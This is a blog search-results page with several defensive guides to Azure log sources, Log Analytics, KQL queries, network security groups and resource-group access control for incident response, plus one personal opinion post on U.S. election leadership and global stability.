top of page

Search Results

326 items found for ""

  • Source of Logs in Azure(P2 :- Tenant/Subscription Logs) : A Comprehensive Guide for Incident Response

    While the Log Analytics Workspace  is an excellent tool for monitoring and analyzing logs in Azure, storing logs in a Storage Account  provides a more cost-effective and flexible solution for long-term retention and external access. This setup allows organizations to store logs for extended periods and export them for integration with other tools or services. Why Export Logs to a Storage Account? There are several benefits to exporting tenant logs  and other Azure logs to a Storage Account : Long-Term Retention : You can define a retention policy to keep logs for months or years, depending on compliance and operational requirements. Cost Efficiency : Compared to storing everything in a Log Analytics Workspace, which is more costly for extensive data, Storage Accounts  offer lower-cost alternatives for long-term log retention. Accessibility : Logs stored in a storage account can be accessed through APIs, or via tools like Azure Storage Explorer , allowing easy download, transfer, and external analysis. However, each organization must balance storage needs with costs, as larger volumes of data will increase storage costs over time. ------------------------------------------------------------------------------------------------------------- Steps to Export Tenant Logs to a Storage Account Step 1: Set Up Diagnostic Settings to Export Logs Navigate to Diagnostic Settings : In the Azure portal, search for Azure Active Directory  and select it. Under the Monitoring  section, select Diagnostic settings . Create a New Diagnostic Setting : Click Add diagnostic setting . Name your setting (e.g., "TenantLogStorageExport"). Select Log Categories : Choose the logs you want to export , such as Audit Logs , Sign-in Logs , and Provisioning Logs . Select Destination : Choose Archive to a storage accoun t  and select the storage account where the logs will be stored. Confirm and save the settings. Once configured, the selected logs will start streaming into the specified storage account. ------------------------------------------------------------------------------------------------------------- Accessing Logs with Azure Storage Explorer Azure Storage Explorer  is a free, graphical tool that allows you to easily access and manage data in your storage accounts, including logs stored as blobs . Using Azure Storage Explorer: Download and Install : Install Azure Storage Explorer  on your local machine from here . Connect to Your Azure Account : Launch Storage Explorer and sign in with your Azure credentials. Browse to your storage account  and locate the blobs  where your logs are stored (e.g., insights-logs-signinlogs). View and Download Logs : Use the explorer interface to view the logs. You can download these blobs to your local machine for offline analysis, or even automate log retrieval using tools like AzCopy  or Python scripts. Logs are typically stored in a hierarchical structure, with each log file containing valuable data in JSON or CSV formats. Examples of Log Types in Storage Accounts Here are some common logs that you might store in your storage account : insights-logs-signinlogs : Logs of all user and service sign-in activities. insights-logs-auditlogs : Logs of administrative changes such as adding or removing users, apps, or roles. insights-logs-networksecuritygrouprulecounter : Tracks network security group rules and counters. insights-logs-networksecuritygroupflowevent : Monitors NSG traffic flows. These logs are stored as blobs, while certain logs (e.g., OS logs) might be stored in tables  within the storage account. https://azure.microsoft.com/en-us/products/storage/storage-explorer/ https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log-schema#schema-from-storage-account-and-event-hubs ------------------------------------------------------------------------------------------------------------- Sending Logs to Event Hub for External Systems If you need to export tenant logs or other logs to a non-Azure system , Event Hub  is a great option . Event Hub is a real-time data ingestion service that can process millions of events per second and is often used to feed external systems such as SIEMs  (Security Information and Event Management). How to Configure Event Hub Export: Create Event Hub : Set up an Event Hub  within Azure Event Hubs  service. Configure Diagnostic Settings : Just as you did for the storage account, go to Diagnostic settings  for Azure Active Directory and select Stream to an event hub  as the destination. Enter the namespace  and event hub name . This setup allows you to forward Azure logs in real-time to any system capable of receiving data from Event Hub, such as a SIEM or a custom log analytics platform. https://azure.microsoft.com/en-us/products/event-hubs/ https://learn.microsoft.com/en-us/entra/identity/monitoring-health/howto-stream-logs-to-event-hub?tabs=splunk ------------------------------------------------------------------------------------------------------------- Leveraging Microsoft Graph API for Log Retrieval In addition to Storage Accounts  and Event Hubs , Azure also supports the Microsoft Graph API  for retrieving tenant logs programmatically. This API allows you to pull log data directly from Azure and Microsoft 365  services. The Graph API  supports many programming languages, including Python, C#, and Node.js, making it highly flexible. It’s commonly used to integrate Azure logs into custom applications or third-party systems. https://developer.microsoft.com/en-us/graph ------------------------------------------------------------------------------------------------------------- All Above logs were part of the tenant logs: Lets start with second log category called Subscription Logs What are Subscription Logs? Subscription logs track and log all activities within your Azure subscription . They record changes made to resources, providing a clear audit trail and insight into tenant-wide services. The primary information recorded includes details on operations, identities involved, success or failure status, and IP addresses. Accessing Subscription Logs Subscription logs are available under the Activity log  in the Azure portal . You can use the logs in multiple ways: View them directly in the Azure portal  for a quick, interactive inspection. Store them in a Log Analytics workspace  for advanced querying and long-term retention. Archive them in a storage account , useful for maintaining a long-term log history. Forward them to a SIEM  (Security Information and Event Management) solution via Azure Event Hub for enhanced security monitoring and correlation. To access the logs in the Azure portal, use the search bar to look for Activity log . This will provide a quick summary view of activities within the portal. https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=powershell ------------------------------------------------------------------------------------------------------------- Key Elements of the Subscription Log Schema Each activity log entry has several key fields that can help in monitoring and troubleshooting. When an action, such as creating a new virtual machine (VM), is logged, the following fields provide detailed information: resourceId : This is a unique identifier for the resource that was acted upon, allowing precise tracking of the specific VM, storage account, or network security group. operationName : Specifies the action taken on the resource. For example, creating a VM might appear as MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE. resultType  and resultSignature : These fields show whether the operation succeeded, failed, or was canceled, with additional error codes or success indicators in resultSignature. callerIpAddress : The IP address from which the action originated, identifying the source of the request. correlationId : A unique GUID that ties together all sub-operations in a single request, allowing you to trace a sequence of actions as part of a single change or request. claims : Contains identity details of the principal making the change, including any associated authentication data. This can include fields from an identity provider like Azure AD, giving insight into the user or service making the request. Each log entry captures critical details that aid in understanding who , what , when , and where  changes were made. ------------------------------------------------------------------------------------------------------------- Subscription Log Access Options Azure offers different access and filtering methods for subscription logs. Here’s a breakdown of how you can utilize the portal effectively: Azure Portal : The Azure portal offers a quick, visual way to explore logs . You can select a subscription, set the event severity level (e.g., Critical, Error, Warning, Informational), and define a timeframe for the log entries you need. The Export Activity Logs  option on the top menu or the Diagnostic Settings  on the left allows you to set up data export or view diagnostic logs. Log Analytics Workspace : The Log Analytics workspace offers a more robust and flexible environment for log analysis . By sending your logs here, you can perform advanced queries, create dashboards, and set up alerts. This workspace enables centralized log management, making it an ideal choice for larger organizations or those with specific compliance requirements. Programmatic Access : Using the PowerShell cmdlet Get-AzLog  or the Azure CLI with az monitor activity-log , you can query the activity logs programmatically . This is useful for automated scripts or integrating logs into third-party solutions. Event Hub Integration : For real-time analysis, integrate subscription logs with Event Hub and forward them to a SIEM for security insights and anomaly detection . This setup is beneficial for organizations that require constant monitoring and incident response. https://learn.microsoft.com/en-us/powershell/module/az.monitor/?view=azps-12.4.0#retrieve-activity-log https://learn.microsoft.com/en-us/cli/azure/service-page/monitor?view=azure-cli-latest#view-activity-log ------------------------------------------------------------------------------------------------------------- Subscription Logs in Log Analytics workspace For Detailed analysis, it's best to set up a Log Analytics workspace . This enables centralized log storage and querying capabilities, combining subscription logs with other logs (such as Azure Active Directory logs (Entra ID Logs) ) for a comprehensive view. The setup process is identical to the one for the tenant logs : select the log categories you wish to save and the Log Analytics workspace to send them to. Subscription Log Categories The main log categories available are: Administrative : Tracks actions related to resources, such as creating, updating, or deleting resources via the Azure Resource Manager. Security : Logs security alerts generated by Azure Security Center. Service Health : Reports incidents affecting the health of Azure services. Alert : Logs triggered alerts based on predefined metrics, such as high CPU usage. Recommendation : Records Azure Advisor recommendations for resource optimization. Policy : Logs policy events for auditing and enforcing subscription-level policies. Autoscale : Contains events from the autoscale feature based on usage settings. Resource Health : Provides resource health status, indicating whether a resource is available, degraded, or unavailable. ------------------------------------------------------------------------------------------------------------- Querying Subscription Logs in Log Analytics The logs are stored in the AzureActivity table in Log Analytics . Here are some example queries: Identify Deleted Resources : AzureActivity | where OperationNameValue contains "DELETE" This query is useful for investigating deletions, such as a scenario where a malicious actor deletes a resource group, causing all contained resources to be deleted. Track Virtual Machine Operations : AzureActivity | where OperationNameValue contains "COMPUTE" | distinct OperationNameValue This query lists unique operations related to virtual machines, helpful for getting an overview of VM activity. Count VM Operations : AzureActivity | where OperationNameValue contains "COMPUTE" | summarize count() by OperationNameValue By counting operations, this query provides insights into the volume of VM activities, which can reveal patterns such as frequent VM creation or deletion. ------------------------------------------------------------------------------------------------------------- Archiving and Streaming Logs To save logs for long-term storage or send them to a SIEM: Configure diagnostic settings to specify the storage account or Event Hub for archiving and real-time streaming. Logs stored in a storage account appear in a structured format, often in JSON files within deeply nested directories, which can be accessed and processed using tools like Azure Storage Explorer. By effectively leveraging subscription logs and these configurations, Azure administrators can enhance monitoring, identify security issues, and ensure accountability in their environments. ----------------------------------------------------------------------------------------------------------- Further we will talk in next blog, Until than stay safe and keep learning Akash Patel

  • A New Era of Global Stability

    As someone living outside the United States, I often hear people say that U.S. elections don’t impact us directly. But I see things differently. For years, I've closely followed the political landscape in the U.S., especially after Donald Trump’s 2016 victory, which brought hope and a new vision for many of us around the world. Through times of uncertainty, I’ve always believed that strong U.S. leadership can inspire stability, innovation, and economic growth that reach far beyond its borders. In the last few years, the world has faced many challenges—economic uncertainty, conflicts, and industry disruptions that have deeply affected global markets, including the IT sector. It’s been hard to watch as so many jobs and dreams have been impacted. This is why, as I watched the U.S. election results with hope, I couldn’t help but feel that leadership in the U.S. can make a real difference in restoring peace, stability, and opportunity. For me, Trump represents a leader who prioritizes a stable economy and jobs, both in the U.S. and worldwide. His policies seem aimed at revitalizing the workforce, investing in the economy, and, hopefully, creating a ripple effect of opportunity that reaches countries like mine. The IT sector, which often feels the impact of global uncertainty, stands to gain from policies that promote growth and open doors to innovation. I truly believe that under strong leadership, we have a chance to regain lost ground, make the job market more resilient, and protect the dreams of so many talented professionals. My hope is that this leadership can reduce tensions, stabilize markets, and foster an environment where technology and innovation can thrive without constant fear of disruption. I believe that people like us, who are watching from afar, have reason to feel hopeful. It’s not just about one country or one election—it’s about the promise of a future where our global workforce can thrive, where ideas can flourish, and where peace and opportunity are within reach for people everywhere. So, as I look forward, I’m choosing to stay positive and hopeful. I believe that with the right leadership, we can create a more secure and stable world—one where professionals in IT and other industries can look to the future with confidence. Together, I hope we can build a world where dreams are realized, opportunities are abundant, and peace prevails. @realDonaldTrump, #donaldtrump, #trump, @ElonMuskNewsOrg, #Elonmusk , #Elon, #musk -------------------------------------Make World Great Again------------------------------------

  • Source of Logs in Azure(P1 :-Tenant Logs) : A Comprehensive Guide for Incident Response

    In cloud-based environments like Azure, maintaining comprehensive visibility over all activities is essential for securing your infrastructure and responding effectively to incidents. One of the most critical tools in your security arsenal is logging . Azure provides a variety of log sources, but not all are enabled by default. Understanding where these logs come from, how to access them, and how to store them can significantly improve your ability to investigate incidents and mitigate risks. The Five Key Azure Log Sources Azure collects logs from various levels of the cloud infrastructure, each serving a unique role in monitoring and security. Here are the five primary log sources you need to be aware of: Tenant Logs Subscription Logs Resource Logs Operating System Logs Application Logs Let’s explore each of these in more detail. Tenant Turned on by default Used to detect password spray attacks or other credentian abuses. Subscription Turned on by default Used to analyze the creation, deletion, start/stop of resources in cases such as crypto mining VM incidents or mass deletion for sabotage cases. Resource Turned off by default Used to log network traffic flow, file storage access for cases such as data exfiltration. Operating System Turned off by default Used to log operating system events, which can show lateral movement. Application Turned off by default Used to create custom logs at the discretion of developers. Azure includes a log for IIS that can be used to show web servers attacks. ------------------------------------------------------------------------------------------------------------- Why Proper Logging Matters in Incident Response In many cases, when an organization is called to respond to a security incident, the first challenge is discovering that key logs were never configured or stored . This leaves responders with limited information and hampers their ability to fully understand the attack. Why is this important? Comprehensive Monitoring : Many log sources, such as resource and OS logs, must be enabled manually . Without these logs, crucial events like unauthorized access or file manipulation might go unnoticed. Cost of Storage : Logs must be stored in Azure, often in a Log Analytics Workspace  or similar storage solution, which incurs additional costs. Without proper budgeting and planning, organizations might avoid enabling these logs due to perceived costs, leaving them vulnerable. Log Retention : Depending on your configuration, logs might only be stored for a short period before being overwritten. Having a strategy in place for exporting and storing logs in a secure, centralized location (such as a SIEM  system) is essential. The ideal setup is to continuously export these logs to a SIEM , where they can be stored long-term and analyzed even after an incident has occurred. This prevents attackers from covering their tracks by deleting logs stored locally in Azure. ------------------------------------------------------------------------------------------------------------- Log Analytics Workspace: Centralizing Your Logs for Efficient Analysis Azure provides a Log Analytics Workspace  as a centralized repository where logs from multiple sources, both Azure-based and non-Azure, can be aggregated and analyzed. This workspace organizes logs into tables , with each data source creating its own table. Key benefits of using a Log Analytics Workspace include: Scalability : The default workspace can handle up to 6GB of logs per minute  and s tore up to 4TB of data per day . This is generally sufficient for most organizations, though custom workspaces can be created for larger log volumes. Access Control : You can set granular permissions based on security roles, ensuring that sensitive logs are only accessible to authorized personnel. By setting up a Log Analytics Workspace, you can automate the collection of logs from all relevant sources and integrate with Azure Monitor  for real-time alerting and analysis. https://learn.microsoft.com/en-us/azure/azure-monitor/logs/workspace-design https://learn.microsoft.com/en-us/azure/azure-monitor/logs/manage-access?tabs=portal ------------------------------------------------------------------------------------------------------------- Setting Up Log Analytics Workspace in Azure A Log Analytics Workspace  allows you to aggregate logs from multiple Azure services and third-party tools into one place. Here’s how to set it up: Step-by-Step Guide to Creating a Log Analytics Workspace Step 1: Sign in to the Azure Portal Go to Azure Portal  and sign in with your credentials. Step 2: Search for 'Log Analytics Workspaces' In the search bar at the top, type Log Analytics Workspaces  and select the service from the list. Step 3: Create a New Workspace Click New  to create a new workspace. Enter the required details: Subscription : Select your Azure subscription. Resource Group : Choose an existing resource group or create a new one. Workspace Name : Name your workspace (e.g., "SecurityLogsWorkspace"). Region : Choose the region where you want the workspace to reside. Step 4: Review and Create After entering all details, click Review + Create  and then Create  to deploy your Log Analytics Workspace. This workspace will serve as a centralized location for all logs, which can be expanded to include tenant logs, subscription logs, resource logs, and more. For more details on creating a Log Analytics workspace, visit Microsoft’s official documentation. https://learn.microsoft.com/en-us/azure/azure-monitor/logs/quick-create-workspace?tabs=azure-portal https://learn.microsoft.com/en-us/azure/azure-monitor/logs/quick-create-workspace?tabs=azure-portal ------------------------------------------------------------------------------------------------------------- Tenant Logs: Overview and Access Tenant logs provide information about operations conducted by tenant-wide services  like Azure Active Directory (AAD)( Entra ID) . These logs are essential for monitoring security-related events such as sign-ins, user provisioning, and audit trails. The key AAD logs include: Audit Logs : Track changes and configuration updates across the tenant. Sign-in Logs : Provide detailed records of user login activity, including success, failure, and multi-factor authentication (MFA) usage. Viewing Tenant Logs in the Azure Portal Sign-in Logs To quickly check sign-in activity, go to the Azure Portal  and navigate t o Azure Active Directory(Entra ID)  > Sign-ins . Here you can view sign-in logs for the last 30 days , showing details such as user, date, status (success, failure, interrupted), and the IP address used. https://learn.microsoft.com/en-us/entra/fundamentals/how-to-manage-user-profile-info Audit Logs Similarly, go to Azure Active Directory(Entra ID)  > Audit Logs  to see tenant-wide changes, such as user account updates and administrative configuration changes. However, the Azure portal  limits logs to the last 30 days , making it unsuitable for long-term forensic analysis or detailed investigations. For comprehensive analysis and historical data retention, s toring logs in a Log Analytics Workspace  is a much better approach. ------------------------------------------------------------------------------------------------------------- Exporting Azure Active Directory Logs to Log Analytics Workspace (Now AAD name have been modified to Entra ID) To take full advantage of tenant logs , including AAD audit and sign-in logs, you should configure the logs to be stored in your Log Analytics Workspace . This allows for extended retention periods, deeper analysis, and cross-correlation with other logs. Step-by-Step Guide to Exporting AAD Logs(Entra ID logs) Step 1: Navigate to Azure Active Directory(Entra ID logs) In the Azure Portal, search for and select Azure Active Directory  from the services list. Step 2: Configure Diagnostic Settings From the AAD  menu, select Diagnostic settings . Click Add diagnostic setting  to configure where the logs will be stored. ------------------------------------------------------------------------------------------------------------- Selecting AAD Logs(Entra ID) and Setting Up Log Analytics Workspace After setting up your Log Analytics Workspace  (as described in previous steps) , the next task is to configure which AAD logs  you want to capture and send to the workspace . Azure provides several types of logs that you can export for analysis: Audit Logs : Logs changes such as adding or removing users, groups, roles, policies, and applications. Sign-in Logs : Tracks sign-in activities, including: User sign-in : Captures direct user login events. Non-interactive sign-in : Logs background sign-ins, such as token refreshes. Service Principal sign-in : Logs sign-ins performed by service principals (used by applications). Managed Identity sign-in : Captures sign-ins for managed identities. Provisioning Logs : Tracks user, group, and role provisioning activities performed by Azure AD. ADFS Sign-in Logs : Monitors federation sign-in events through Active Directory Federation Services (ADFS) . Identity Protection Logs : Tracks risky users and events, including RiskyUsers , UserRiskEvents , RiskyServicePrincipals , and ServicePrincipalRiskEvents . N etwork Access Traffic Logs : Logs network traffic for policy and risk management, including user experience data. To set this up : Navigate to Diagnostic Settings : Go to the Azure Active Directory  ( Entra ID ) service in the Azure portal. In the left menu, click Diagnostic settings  and then select Add diagnostic setting . Choose Logs to Export : Select the categories of logs you want to export to the Log Analytics Workspace  (e.g., AuditLogs, SignInLogs, ProvisioningLogs). Specify the Log Analytics Workspace  where these logs will be stored. Save Settings : Confirm the logs you’ve selected and save the diagnostic setting. Once configured, these logs will be automatically sent to the designated Log Analytics Workspace  for long-term storage and analysis. https://learn.microsoft.com/en-us/entra/id-protection/ ------------------------------------------------------------------------------------------------------------- Managing Storage Costs While it may be tempting to store all available logs, storage costs can accumulate quickly, especially for large organizations with a lot of activity. One cost-saving measure is to use Azure Storage Accounts  for logs that don't require constant querying but need to be archived for compliance or later use. For critical logs, such as sign-in  and audit logs , continuous export to the Log Analytics Workspace  is recommended for monitoring real-time activity and performing incident response. However, less frequently accessed logs can be stored more cost-effectively in a storage account. ------------------------------------------------------------------------------------------------------------- Querying AAD Logs(Entra ID logs) Using Kusto Query Language (KQL) Once AAD logs are flowing into your Log Analytics Workspace, you can use Kusto Query Language (KQL)  to search, filter, and analyze log data. KQL is a powerful language for querying logs and has a syntax similar to SQL, making it approachable for those familiar with databases. Example of a Simple KQL Query: SigninLogs | where TimeGenerated > ago(1d) | where ResultType == 0 SigninLogs : The first line specifies the log type you want to search. TimeGenerated > ago(1d) : Filters the query to only include logs from the past 24 hours. ResultType == 0 : This line filters for successful logins (ResultType 0 corresponds to success). This simple query helps you identify all successful sign-in attempts in the last 24 hours. KQL also allows for more complex queries involving joins, aggregations, and visualizations, making it a robust tool for analyzing log data. For more details on KQL, visit Microsoft’s KQL Documentation . ------------------------------------------------------------------------------------------------------------- Using Pre-Built Queries in Log Analytics Microsoft also provides a set of pre-built queries  for common scenarios , such as analyzing sign-ins, audit events, or identifying risky behavior in your tenant. These queries serve as templates, which you can customize based on your specific investigation needs. Pre-Built Queries : These are particularly useful when first starting with KQL, as they provide a foundation for your own queries and ensure you're asking the right questions of your data. To use these pre-built queries: Open your Log Analytics Workspace  in the Azure portal. Navigate to the Logs  section. Search for the desired query in the query library, or start with a template and adjust it to suit your needs. https://learn.microsoft.com/en-us/azure/azure-monitor/logs/log-analytics-overview ------------------------------------------------------------------------------------------------------------- Further we will talk in next blog, Until than stay safe and keep learning Akash Patel

  • Azure Compute: Understanding VM Types and Azure Network Security for Incident Response

    Microsoft Azure provides a wide range of compute services, organized based on workload types and categorized as Infrastructure as a Service (IaaS) , Platform as a Service (PaaS) , or Software as a Service (SaaS) . For incident response and forensic investigations, the focus is typically on virtual machines (VMs)  and the related networking infrastructure. ----------------------------------------------------------------------------------------------------------- Virtual Machines: Types and Applications Azure offers various classes of virtual machines tailored for different workloads, all with specific performance characteristics. Here’s a breakdown of the most common VM types you'll encounter during an investigation: Series A (Entry Level) : Use Case : Development workloads, low-traffic websites. Examples : A1 v2, A2 v2. Series B (Burstable) : Use Case : Low-cost VMs with the ability to "burst" to higher CPU performance when needed. Examples : B1S, B2S. Series D (General Purpose) : Use Case : Optimized for most production workloads. Examples : D2as v4, D2s v4. Series F (Compute Optimized) : Use Case : Compute-intensive workloads, such as batch processing. Examples : F1, F2s v2. Series E, G, and M (Memory Optimized) : Use Case : Memory-heavy applications like databases. Examples : E2a v4, M8ms. Series L (Storage Optimized) : Use Case : High throughput and low-latency applications. Examples : L4s, L8s v2. Series NC, NV, ND (Graphics Optimized) : Use Case : Visualization, deep learning, and AI workloads. Examples : NC6, NV12s. Series H (High Performance Computing) : Use Case : Applications such as genomic research, financial modeling. Examples : H8, HB120rs v2. https://azure.microsoft.com/en-us/pricing/details/virtual-machines/windows/ https://azure.microsoft.com/en-us/pricing/details/virtual-machines/linux/ VM Storage: Managed Disks Managed Disks  in Azure operate similarly to physical disks but come with a few key distinctions relevant for incident response: Types of Managed Disks : Standard HDD : Slow, low-cost. Standard SSD : Standard for most production workloads. Premium SSD : High performance, better suited for intensive workloads. Ultra Disk : Highest performance for demanding applications. Each VM can have multiple managed disks , including an OS disk, temporary disk (for short-term storage), and one or more data disks. Forensics often involves snapshotting the OS disk  of a compromised VM, attaching that snapshot to a new VM for further analysis. Costs are associated with: Disk type and size. Snapshot size (critical for investigations). Outbound data transfers (when retrieving forensic data). I/O operations (transaction costs). https://learn.microsoft.com/en-us/azure/virtual-machines/managed-disks-overview https://learn.microsoft.com/en-us/azure/virtual-machines/disks-types ----------------------------------------------------------------------------------------------------------- Azure Virtual Network (VNet): The Glue Behind Azure Resources An Azure Virtual Network ( VNet)  allows Azure resources like VMs to communicate with each other and with external networks . During an incident response, it’s essential to understand the network topology  to see how resources were connected, what traffic was allowed, and where vulnerabilities might have existed. Key points about VNets: Private Addressing : Azure assigns a private IP range (typically starting with 10.x.x.x). Public IP Addresses : Required for internet communication, but comes with extra charges. On-Premises Connectivity : Point-to-Site VPN : Connects individual computers to Azure. Site-to-Site VPN : Connects an on-premises network to Azure. Azure ExpressRoute : Private connections that bypass the internet. https://learn.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview ----------------------------------------------------------------------------------------------------------- Network Security Groups (NSG): Traffic Control and Incident Response NSG Overview : Azure automatically creates NSGs to protect resources, like virtual machines (VMs), by allowing or blocking traffic based on several criteria: Source/Destination IP : IP addresses from which the traffic originates or to which it is sent. Source/Destination Port : The network ports involved in the connection. Protocol : The communication protocol (e.g., TCP, UDP). Rule Prioritization : NSG rules are processed in order of their priority , with lower numbers having higher priority. Custom rules have priorities ranging from 100 to 4096 , while Azure-defined rules have priority in the 65000 range. Incident Response Tip : Ensure that firewall rules are correctly prioritized. A common issue during investigations is discovering that a misconfigured or improperly prioritized rule allowed malicious traffic to bypass protections. Flow Logs :Network flow logs , which capture traffic information, are essential for understanding traffic patterns and investigating suspicious activity . Flow logs are generated every minute, and the first 5GB per month is free. After that, the cost is $0.50 per GB plus storage charges. Example : If an attack involved unauthorized access through a compromised port, flow logs would help you trace the origin and nature of the traffic, providing critical forensic data. https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-overview https://learn.microsoft.com/en-us/azure/virtual-network/network-security-groups-overview#network-security-groups ----------------------------------------------------------------------------------------------------------- Network Virtual Appliances (NVA): Advanced Network Security Azure provides additional options for advanced traffic management and security beyond basic NSGs: Azure Load Balancer : Distributes incoming network traffic across multiple resources to balance load. Azure Firewall : Offers advanced filtering, including both stateful network and application-layer inspections. Application Gateway : Protects web applications by filtering out vulnerabilities like SQL injection and cross-site scripting (XSS). VPN Gateway : Connects on-premises networks securely to Azure. Many third-party Network Virtual Appliances  are also available on the Azure Marketplace , such as firewalls, VPN servers, and routers, which can be vital components in your investigation. https://azuremarketplace.microsoft.com/en-us/marketplace/apps/category/networking?page=1&subcategories=all ----------------------------------------------------------------------------------------------------------- Azure Storage: Central to Forensics and Logging Azure storage accounts  are integral to how logs and other data are stored during investigations. Proper storage setup ensures data retention and availability for analysis. Storage Account Types : Blob Storage : Scalable object storage for unstructured data, such as logs or multimedia. File Storage : Distributed file system storage. Queue Storage : For message storage and retrieval. Table Storage : NoSQL key-value store, now part of Azure Cosmos DB . Blob Storage : Blobs  (Binary Large Objects) are highly versatile and commonly used for storing large amounts of unstructured data, such as logs during forensic investigations. Blobs come in three types: Block Blobs : Ideal for storing text and binary data, can handle up to 4.75TB per file. Append Blobs : Optimized for logging, where data is appended rather than overwritten. Page Blobs : Used for random access data, like Virtual Hard Drive (VHD) files. Direct Access and Data Transfers :With the appropriate permissions, data stored in blob storage can be accessed over the internet via HTTP or HTTPS. Azure provides t ools like AzCopy  and Azure Storage Explorer  to facilitate the transfer of data in and out of blob storage. Example : Investigators may need to download logs or snapshots stored in blobs for offline analysis. Using AzCopy  or Azure Storage Explorer , these files can be easily transferred for examination. ----------------------------------------------------------------------------------------------------------- How This Script Helps: VM Information for Analysis : The extracted data (VM ID and VM size) is essential for identifying and analyzing the virtual machines involved in an incident. $results = get-azlog -ResourceProvider "Microsoft.Compute" -DetailedOutput $results.Properties | foreach {$_} | foreach { $contents = $_.content if ($contents -and $contents.ContainsKey("responseBody")) { $fromjson = ($contents.responseBody | ConvertFrom-Json) $newobj = New-Object psobject $newobj | Add-Member NoteProperty VmId $fromjson.properties.vmId $newobj | Add-Member NoteProperty Vmsize $fromjson.properties.hardwareprofile.vmsize $newobj } } ----------------------------------------------------------------------------------------------------------- Conclusion: In Azure, combining effective Network Security Group (NSG)  management with automated VM log extraction  provides essential visibility for incident response. Understanding traffic control through NSGs and using PowerShell scripts for VM log retrieval empowers organizations to investigate security incidents efficiently, even without advanced security tools like SIEM. Akash Patel

  • "Azure Resource Groups and Role-Based Access Control: A Comprehensive Guide for Incident Response and Forensics in the Cloud"

    Microsoft Azure is a vast ecosystem of cloud-based services and tools, offering almost limitless possibilities for building, managing, and scaling applications. But when it comes to incident response or forensic investigation, the Azure landscape can feel overwhelming . To make things clearer, let's focus on the essential elements you're most likely to encounter during such operations. Understanding Azure's Structure: The Building Blocks Think of Azure as a layered architectur e, with each layer adding a distinct function that contributes to how an organization manages and controls its cloud resources . Here are the key components: 1. **Azure Tenant** Picture the tenant as the foundation of a house —the basis for everything else. It represents the entire organization and is associated with an **Azure Active Directory (AAD)(Entra ID)** instance, which handles identity and access management . If you're responding to a security breach, this is where you'll likely start your investigation—analyzing user and group permissions in AAD to find any clues about unauthorized access . 2. **Management Groups** In larger enterprises, it's common to have many different projects running across Azure, each with its own budget, team, and purpose. To keep things tidy, **management groups** help organize multiple subscriptions under a single umbrella. For example, a company could have different management groups for its production and development environments. This setup lets administrators apply policies across all relevant subscriptions in one go—a time-saving feature that also helps standardize security practices. **For Example**: Imagine you're investigating a security incident in a multinational corporation. You may find that production environments are more tightly controlled compared to development, thanks to separate management groups. This organization helps you narrow down where a misconfiguration or security hole might exist. 3. **Subscriptions** Subscriptions are like folders within the cloud that help organize resources and manage billing. Each subscription can contain a collection of resources such as virtual machines, storage accounts, and databases. In a forensic investigation, this is where things get interesting because every subscription can have different access permissions. **Key Point**: If you're investigating a security breach, ensure you have access to all relevant subscriptions because the compromised resource could be hidden within a subscription you're not initially granted access to. 4. **Resource Groups** Moving deeper into Azure's structure, r esource groups act as containers that hold related resources, such as virtual machines or storage accounts. For example, a company might group all resources related to a specific app in one resource group. **Investigative Tip**: Sometimes, you’ll only get access to a single resource group rather than an entire subscription. In that case, your view of the infrastructure will be narrow, limiting your ability to see the bigger picture. Whenever possible, push for subscription-level access. 5. **Resources** Finally, resources are the individual services and assets—virtual machines, networking components, storage accounts, and so on . They are the nuts and bolts of Azure, and they are also the focus of most investigations. For example, if a virtual machine has been compromised, you'll need to scrutinize the VM, its associated storage, and network configurations to understand the breach. ------------------------------------------------------------------------------------------------------------- ### Subscriptions: The Power Behind Azure's Flexibility Once your tenant is up and running, you’ll need to define one or more **subscriptions**. Each subscription is essentially a contract with Microsoft for cloud services, with charges accumulating based on usage . Large companies often set up multiple subscriptions to track different projects, which also helps them monitor costs across various departments or teams. During an investigation, gaining access to the right subscription is crucial because that's where the resources live. Permissions at this level can make or break your ability to fully explore and analyze cloud infrastructure. It’s also worth noting that subscriptions come with limits—for example, the number of virtual CPUs (vCPUs) might be capped. If a breach involves a resource-heavy virtual machine, you may need to request a limit increase from Microsoft. https://learn.microsoft.com/en-us/microsoft-365/enterprise/subscriptions-licenses-accounts-and-tenants-for-microsoft-cloud-offerings?view=o365-worldwide ------------------------------------------------------------------------------------------------------------- ### Azure Resource Manager: The Conductor of the Cloud Before diving into specifics like virtual networks or storage, it's essential to understand **Azure Resource Manager (ARM)**. T hink of ARM as the brain behind all deployments in Azure. It provides a management layer, handling the creation, updating, and deletion of resources. One of ARM's strengths is that it takes input from various interfaces—Azure Portal, PowerShell, CLI, or even REST APIs—and ensures consistency across them. It’s especially useful during a forensic investigation because you can use any of these tools to explore resource configurations or query logs. ARM also supports templates, written in JSON, that allow resources to be deployed consistently . These templates serve as a record of how resources were deployed and configured, offering valuable information during an investigation. For example, if a misconfigured virtual machine was deployed using an ARM template, you could identify that exact misconfiguration and track how it might have contributed to a breach. https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/overview ------------------------------------------------------------------------------------------------------------- Why Resource Groups Matter for Incident Response From an incident response  and forensic investigation  perspective, understanding resource groups is essential. Often, the resources involved in an attack or breach will be grouped together under a specific resource group, allowing you to track and manage them collectively. For example: Ease of Management : If an attacker compromises several virtual machines within a resource group, you can manage, update, or even delete all the compromised resources in one go by targeting the resource group. Access Control : Role-based access control (RBAC) can be set at the resource group level. This means that permissions for an entire group of resources can be managed centrally, making it easier to ensure that only authorized users have access. However, o ne potential challenge is that during investigations, you might only be granted access to a specific resource group rather than the entire subscription. While this can be helpful for isolating resources, it limits your view of the full Azure environment. If you're only granted permissions for one resource group , you could miss key elements or additional compromised resources in other parts of the subscription. Always aim to request higher-level permissions for a complete view during an investigation. ------------------------------------------------------------------------------------------------------------- Azure Resource Providers: The Backend Support Each resource in Azure is managed by a resource provider , which is a service responsible for provisioning, managing, and configuring the resources. For example: To deploy a virtual machine , Azure uses the Microsoft.Compute resource provider . For a storage account , the Microsoft.Storage resource provider is used . When performing investigations or responding to incidents, you won't directly interact with resource providers most of the time. However, understanding that they operate in the background helps you track what services are involved when examining Azure Resource Manager (ARM) templates or logs. ------------------------------------------------------------------------------------------------------------- Key Azure Services for Incident Response and Forensics For forensic investigations and incident response, there are certain Azure products you’re likely to interact with the most: Identity and Access Management : Azure Active Directory (AAD)/Entra ID : Controls identity and access management, a key area to investigate when tracking how a threat actor gained 